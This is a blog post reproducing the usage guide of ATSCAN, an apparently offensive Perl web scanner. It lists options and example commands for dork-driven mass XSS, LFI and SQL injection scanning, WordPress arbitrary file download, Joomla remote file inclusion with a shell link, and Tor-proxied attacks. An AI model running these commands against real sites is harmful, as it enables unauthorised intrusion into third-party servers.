الثلاثاء، 29 ديسمبر 2015

ATSCAN

ATSCAN

Site / server scanner



Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
This this my first script im sure is full with mistakes!!
Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0,
Arch Linux, Fedora Linux, Centos.
 if you use a windows you can download manualy
Download & Executution:
git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x ATSCAN
./ATSCAN
OR
$chmod +x atscan.pl
Execute: perl ./atscan.pl
Execute: perl ./atscan.pl --help
HELP:
--tortor proxy [DEFAULT:socks://localhost:9050] Change if needed!
--dorkSearch engine
--mpset number of page results to scan
--xssXss scan
--lfilfi scan
-tTarget
-lList name
--expSet exploit
--validText for validate results
--sqlmapSqlmaping xss results
--sqlmaptorSqlmaping xss results using tor proxy
--lfilocal file inclusion
--joomrfiget joomla sites with rfi in the server
--shellshell link [Ex: http://www.site.com/shell.txt]
--wpadfget wordpress sites with arbitery file download in the server
--adminget site admin page
--shostget site subdomains
--portsscan server ports
--startstart scan port
--endend scan port
--tcptcp ports
--udpudp ports
--allcomplete mode
--basicbasic mode
--sitessites in the server
--wpwordpress sites in the server
--joomjoomla sites in the server
--uploadget sites with upload files in the server
--zipget sites with zip files in the server
--ststring
--md5convert to md5
--encode64encode base64 string
--decode64decode base64 string
--isupcheck http status 200
--httpdprint site httpd version
EXAMPLES:
Simple search: 

-s DORK --mp [number of page results to scan]
-s [DORK1,DORK2,DORK3..] --mp [number of page results to scan]
-s [DORK.txt] --mp [number of page results to scan from list]

Subscan from Serach Engine

Xss: --dork DORK --mp 1 --xss
Xss: --dork DORKS.TXT --mp 1 --xss
Lfi: --dork DORK --mp 1 --lfi
Search + Command: --dork DORK --mp VALUE --command 'curl -v' --TARGET

Validation

Xss: --dork DORK --mp 1 --xss --valid TEXT
Lfi: --dork DORK --mp 1 --lfi --valid TEXT
Xss: --dork DORK --mp 1 --xss --isup
Lfi: --dork DORK --mp 1 --xss --isup
Xss: --dork DORKS.TXT --mp 1 --xss --valid TEXT
Lfi: --dork DORKS.TXT --mp 1 --lfi --valid TEXT
Xss: --dork DORKS.TXT --mp 1 --xss --isup
Lfi: --dork DORKS.TXT --mp 1 --xss --isup

Use List / Target

Xss: -t TARGET --xss
Lfi: -l TARGET --lfi
Xss + Validation: -t TARGET --xss --valid TEXT
Lfi + Validation: -t TARGET --lfi --valid TEXT
Xss + Validation: -l list.txt --xss --isup
Lfi + Validation: -l list.txt --lfi --isup
Find admin page: -t TARGET --admin
Find subdomains: -t TARGET --shost

Server: 

Get Server sites: -t IP --mp [VALUE] --sites
Get Server sites: -t IP.txt --mp [VALUE] --sites
Get Server wordpress sites: -t IP --mp [VALUE] --wp
Get Server joomla sites: -t IP --mp [VALUE] --joom
Get Server upload sites: -t IP --mp [VALUE] --upload
Get Server zip sites files: -t IP --mp [VALUE] --zip
WP Arbitry File Download: -t IP --mp [VALUE] --wpadf
Joomla RFI: -t IP --mp <1> --joomfri --shell SHELL LINK
Scan basic tcp (quick): -t IP --ports --basic --tcp
Scan basic udp basic (quick): -t IP --ports --basic --udp
Scan basic udp+tcp: -t IP --ports --basic --udp --tcp
Scan complete tcp: -t IP --ports --all --tcp
Scan complete udp: -t IP --ports --all --udp
Scan complete tcp+udp: -t IP --ports --all --udp --tcp
Scan rang tcp: -t IP --ports --start --end --tcp
Scan rang udp: -t IP --ports --start --end --udp
Scan rang udp + tcp: -t IP --ports --start VALUE --end VALUE --udp --tcp

Encode / Decode: 

Generate MD5: -st STRING --md5
Encode base64: -st STRING --encode64
Decode base64: -st STRING --decode64

Demo:



ATSCAN 9.6 RELEASE IS OUT >> 

SOME INSTUCTIONS ARE CHANGED!!
USE HELP MENU TO SEE CHANGES!!!

هناك 6 تعليقات: